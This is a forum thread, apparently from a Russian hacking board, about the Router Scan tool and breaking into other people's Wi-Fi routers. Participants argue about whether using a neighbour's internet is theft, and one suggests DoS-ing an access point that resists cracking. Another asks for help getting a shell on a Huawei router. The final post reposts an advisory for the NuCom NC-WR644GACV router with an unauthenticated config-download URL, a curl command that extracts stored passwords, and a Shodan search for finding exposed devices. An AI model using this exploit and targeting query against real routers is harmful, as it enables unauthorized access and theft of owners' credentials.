прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,419
    Likes Received:
    9,122
    Reputations:
    115
    Полностью с вами согласен.

    Но во-перых, воровать можно лишь то, что лимитно (а я пользуюсь безлимитным подключением).

    А во-вторых, может быть сосед меня хорошо знает, с моими заслугами, и делится своим интернетом добровольно? :)
     
    chugunkin, robert and sha9 like this.
  2. mxhelmy

    mxhelmy New Member

    Joined:
    11 May 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Thank bro, It downloaded a 6KB file the encrypted one first, thanks for fixing the link, I don't know if you fixed it or it's just my browser being weird

    Someone please delete the past posts. it was a mistake
     
  3. keshavredina

    keshavredina Member

    Joined:
    30 Mar 2016
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    Во-первых, никто не разрешал воровать. Всё равно, используя интернет-канал, вы снимаете владельцу скорость, и я не думаю, что он этого хочет.
    Во-вторых, если бы сосед хотел бы с вами делится своим интернетом добровольно, он бы пришёл к вам и дал бы пароль или иным способом передал бы его вам.
    В-третьих, воровство – грех.
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,419
    Likes Received:
    9,122
    Reputations:
    115
    You can do it yourself.
     
  5. keshavredina

    keshavredina Member

    Joined:
    30 Mar 2016
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    Если вы думаете, что сосед желает с вами делится интернетом, то придите к нему и спросите, прежде чем без его ведома использовать его собственную сеть.
     
  6. mxhelmy

    mxhelmy New Member

    Joined:
    11 May 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Do you have any idea how to enter shell mode on Huawei HG630 V2,after decrypting the defaultcfg.xml there is no passoword for shell, I can have connection with the telnet,ssh now but the shell commands is limited on save,reboot,restore , I tried to write shell,welcome to shell, sh but there not working all non supported commands returns "command failed"
     
  7. keshavredina

    keshavredina Member

    Joined:
    30 Mar 2016
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    Знайте: с вами так долго не прокатит, лучше бросайте это нехорошее дело, иначе можете сильно попасть, и тогда будете жалеть.
     
  8. khamyk

    khamyk Well-Known Member

    Joined:
    30 Dec 2013
    Messages:
    529
    Likes Received:
    326
    Reputations:
    0
    Слышь правильный, онлайн церковь на другом сайте!
     
    010001110101011, sha9, oleedd and 3 others like this.
  9. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    678
    Likes Received:
    954
    Reputations:
    7
    Да чтож вы так серьёзно то? :)
    Ведь, именно только благодаря такой "критике", понимаешь что живёшь не напрасно, и работа которой занят - нужная. ;)
     
  10. Hose12

    Hose12 Member

    Joined:
    13 Aug 2015
    Messages:
    99
    Likes Received:
    67
    Reputations:
    0
    По-моему он свой пароль в базу сканом загрузил, теперь рвёт волосы во всех местах.
     
    010001110101011, robert, sha9 and 6 others like this.
  11. Tudiblad

    Tudiblad Member

    Joined:
    3 Oct 2017
    Messages:
    47
    Likes Received:
    16
    Reputations:
    0
    Очень напоминает сценарий фильма по бизнесмена Фому. :)
     
    sha9 likes this.
  12. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,049
    Likes Received:
    3,418
    Reputations:
    72
    Ну если взломать не удается, то можно положить точку дос атакой.
    Кто это запретил воровать? Ты спроси об этом у депутатов, они тебе скажут.
    Когда от большого берется немножко, это не воровство, а просто дележка.
    Иди матчасть учи, а то сам попадешь и будешь жалеть.
    Ну и в третьих. Кого только не рожают.
     
    Majgap, chugunkin, sha9 and 4 others like this.
  13. mxhelmy

    mxhelmy New Member

    Joined:
    11 May 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Are you guys fighting over me or what?
     
  14. qwerty_332

    qwerty_332 Banned

    Joined:
    21 Mar 2017
    Messages:
    31
    Likes Received:
    13
    Reputations:
    0
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,419
    Likes Received:
    9,122
    Reputations:
    115
    В первой мало смысла, для неё нужно быть залогиненным (почитайте внимательно код). Хотя может быть можно её приспособить для вытаскивания пароля админа при заходе юзером, но не думаю, что это будет так просто...

    Вторая вообще для UPnP, а не для веб морды роутера.
    Определение поправил, там всё было предельно просто. :) Но на всех трёх IP уязвимость закрыта.
     
    sha9, Triton_Mgn, Kakoluk and 3 others like this.
  16. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    77
    Reputations:
    51
    А где брать поправленые версии? Они обновляются на сайте http://stascorp.com/load/1-1-0-56? И как правильно их обновлять?
     
  17. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,298
    Likes Received:
    10,123
    Reputations:
    115
    @4ikotillo

    Если не ошибаюсь, то самые новые всегда тут!
     
    sha9, Toroid, hunt.lsk and 5 others like this.
  18. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    77
    Reputations:
    51
    Отлично! Спасибо, большое! =)
     
  19. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    731
    Reputations:
    2
    простите за нескромный вопрос, а зачем вам лично понадобились инструменты для вардрайвинга,бэкдоры под туполинк и прошивки опеврт если вы такой законопослушный гражданин? коли охота сойти за правоборца, хотя бы удалите свои сообщения на форуме (по крайней мере некоторые из них):)


    п.с. не учите меня жить,лучше помогите материально (о.бендер) :p:D:D
     
    #6199 sha9, 4 Jul 2018
    Last edited: 4 Jul 2018
    Majgap, Gashek, Veil and 1 other person like this.
  20. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    731
    Reputations:
    2
    эксплойт роутера NuCom NC-WR644GACV
    Overview
    ========
    Researchers of NVEL4 Cybersecurity company have discovered that it is
    possible to access to the config file bypassing admin authentication and
    authorization. The vulnerability has been reported to the vendor. The
    vendor has confirmed the vulnerability but not issued to security advisory.

    The recommendation to affected users is to update to the latest available
    version and change the credentials used, since they could have been
    extracted.

    Some NuCom routers are exposed to internet.
    Product Details
    =============
    * Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
    * Vendor: NuCom
    * Model Name: NC-WR644GACV
    * Vulnerable Software Version: <= STA 005
    * Fixed Software Version: STA 006

    Vulnerability Details
    ===================
    * CVE: 2018-8755
    * Name: Unauthenticated Configuration File Download
    * Type: Authentication / Authorization Bypass
    * Description: An unauthorizated user can download config file by
    accessing to the URL directly
    * Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
    * Impact: By downloading the config file an attacker can read all
    password stored in plain-text and base64 then access vie web as
    administrator and gain privileged control of the device.

    PoC
    ====

    zerial@home:~$ curl -s "http://vulnerable.hostname/
    cgi-bin/config_download.cgi?action=download"|strings|grep -i password
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
    PASSWORD HERE]
    InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
    WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
    PASSWORD HERE]
    zerial@home:~

    шодан дорк
    NC-WR644GACV
     
    Kakoluk, Mednik, hydra and 5 others like this.
Loading...